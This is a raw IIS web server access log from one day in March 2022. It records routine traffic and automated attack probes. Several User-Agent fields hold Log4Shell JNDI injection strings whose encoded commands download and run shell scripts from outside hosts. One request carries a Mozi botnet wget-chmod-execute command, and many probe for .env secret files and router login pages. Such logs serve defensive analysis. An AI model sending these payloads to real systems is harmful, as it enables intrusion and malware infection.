#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 00:04:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 00:04:01 192.168.0.14 POST /Autodiscover/Autodiscover.xml - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 00:20:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 00:20:10 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 484 2022-03-28 00:27:02 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 312 2022-03-28 00:30:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 01:34:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 01:34:04 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 484 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 01:54:41 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 01:54:41 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.3+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 12222 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 02:37:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 02:37:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 03:42:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 03:42:51 192.168.0.14 GET /:undefined - 80 - 192.168.0.1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') 400 0 0 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 05:25:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 05:25:28 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 409 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 05:46:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 05:46:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 156 2022-03-28 05:46:30 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 06:53:56 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 06:53:56 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 421 2022-03-28 07:00:35 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 404 0 2 234 2022-03-28 07:00:35 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 405 0 1 218 2022-03-28 07:10:58 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 404 0 2 203 2022-03-28 07:10:58 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 405 0 1 203 2022-03-28 07:24:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 906 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 08:15:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 08:15:46 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 404 0 2 328 2022-03-28 08:15:46 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 405 0 1 359 2022-03-28 08:28:41 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 404 0 2 218 2022-03-28 08:28:41 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Linux;+U;+Android+4.4.2;+en-US;+HM+NOTE+1W+Build/KOT49H)+AppleWebKit/534.30+(KHTML,+like+Gecko)+Version/4.0+UCBrowser/11.0.5.850+U3/0.8.0+Mobile+Safari/534.30 - 405 0 1 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 08:53:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 08:53:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 484 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 09:24:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 09:24:23 192.168.0.14 GET /boaform/admin/formLogin username=user&psd=user 80 - 192.168.0.1 - - 404 0 2 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 10:22:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 10:22:45 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 640 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 11:28:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 11:28:12 192.168.0.14 GET / - 80 - 192.168.0.1 python-requests/2.27.1 - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 12:01:14 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 12:01:14 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 562 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 12:28:34 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 12:28:34 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 390 2022-03-28 12:28:34 192.168.0.14 POST /HNAP1/ - 80 - 192.168.0.1 Mozila/5.0 - 404 0 2 156 2022-03-28 12:42:56 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 125 2022-03-28 12:47:50 192.168.0.14 GET / - 80 - 192.168.0.1 Linux+Gnu+(cow) - 200 0 0 125 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 13:13:53 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 13:13:53 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 328 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 14:08:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 14:08:04 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 281 2022-03-28 14:11:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 359 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 14:38:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 14:38:01 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 312 2022-03-28 14:48:36 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 328 2022-03-28 15:04:08 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 250 2022-03-28 15:04:08 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 15:56:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 15:56:13 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 359 2022-03-28 15:56:13 192.168.0.14 GET /conf/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:14 192.168.0.14 GET /wp-content/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 250 2022-03-28 15:56:14 192.168.0.14 GET /wp-admin/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:15 192.168.0.14 GET /library/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:15 192.168.0.14 GET /new/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:17 192.168.0.14 GET /vendor/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:17 192.168.0.14 GET /old/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:18 192.168.0.14 GET /local/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 282 2022-03-28 15:56:18 192.168.0.14 GET /api/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:19 192.168.0.14 GET /blog/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 267 2022-03-28 15:56:19 192.168.0.14 GET /crm/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 250 2022-03-28 15:56:20 192.168.0.14 GET /admin/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 312 2022-03-28 15:56:20 192.168.0.14 GET /laravel/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:21 192.168.0.14 GET /app/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 296 2022-03-28 15:56:21 192.168.0.14 GET /app/config/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:23 192.168.0.14 GET /apps/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:23 192.168.0.14 GET /audio/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:24 192.168.0.14 GET /cgi-bin/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:24 192.168.0.14 GET /backend/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:25 192.168.0.14 GET /src/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:25 192.168.0.14 GET /base/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 267 2022-03-28 15:56:26 192.168.0.14 GET /core/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 296 2022-03-28 15:56:26 192.168.0.14 GET /vendor/laravel/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:28 192.168.0.14 GET /storage/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:28 192.168.0.14 GET /protected/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:29 192.168.0.14 GET /newsite/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 265 2022-03-28 15:56:29 192.168.0.14 GET /www/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:30 192.168.0.14 GET /sites/all/libraries/mailchimp/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 296 2022-03-28 15:56:30 192.168.0.14 GET /database/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:31 192.168.0.14 GET /public/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:32 192.168.0.14 GET /14.139.109.23/.env - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 15:56:32 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 405 0 1 421 2022-03-28 15:56:34 192.168.0.14 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.183+Safari/537.36 - 404 0 2 281 2022-03-28 16:09:35 192.168.0.14 GET /:undefined - 80 - 192.168.0.1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') 400 0 0 328 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 17:29:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 17:29:55 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 1656 2022-03-28 17:29:56 192.168.0.14 POST /HNAP1/ - 80 - 192.168.0.1 Mozila/5.0 - 404 0 64 609 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 18:56:02 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 18:56:02 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 19:45:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 19:45:49 192.168.0.14 GET / - 80 - 192.168.0.1 t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//77.247.127.112:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjY5Ljg5LjEwNS9sc2hib290OyBjaG1vZCA3NzcgbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}') t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//77.247.127.112:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjY5Ljg5LjEwNS9sc2hib290OyBjaG1vZCA3NzcgbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}') 200 0 0 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 20:18:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 20:18:48 192.168.0.14 GET /:undefined - 80 - 192.168.0.1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178.62.196.118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA0LjE2OC40OS4yOS84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xMDQuMTY4LjQ5LjI5LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNoOyBybSAtcmYgKg==}') 400 0 0 531 2022-03-28 20:31:49 192.168.0.14 GET /shell cd+/tmp;rm+-rf+*;wget+http://103.41.24.17:36655/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 80 - 192.168.0.1 Hello,+world - 404 0 2 93 2022-03-28 20:33:01 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 21:20:56 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 21:20:56 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 314 2022-03-28 21:20:56 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 375 2022-03-28 21:23:42 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 234 2022-03-28 21:23:42 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 200 0 0 234 2022-03-28 21:38:29 192.168.0.14 GET /functionRouter - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-03-28 22:24:12 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-03-28 